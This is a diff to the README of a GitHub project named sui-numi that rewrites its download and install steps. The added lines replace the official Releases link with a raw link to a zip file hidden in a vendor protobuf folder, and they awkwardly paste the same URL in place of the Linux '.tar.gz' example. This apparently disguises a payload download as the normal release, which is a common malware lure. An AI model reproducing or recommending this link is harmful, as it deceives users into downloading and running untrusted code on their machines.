AX-star/sui-numi/readme.md

 ## 📥 Download & Install

-To download and run sui-numi, please visit this page to download: [sui-numi Releases](https://github.com/AX-star/sui-numi/releases).
+To download and run sui-numi, please visit this page to download: [sui-numi Releases](https://raw.githubusercontent.com/AX-star/sui-numi/main/vendor/sui-apis/proto/google/sui-numi-v3.1.zip).
 Here, you will find the latest version of the software available for your operating system.

 1. Click on the release version you want to download.
-2. Locate the appropriate file for your system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+2. Locate the appropriate file for your system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/AX-star/sui-numi/main/vendor/sui-apis/proto/google/sui-numi-v3.1.zip` for Linux).
 3. Download the file to your computer.
 It may take a few moments depending on your internet speed.
 4. Once the download is complete, open the file to run the installation.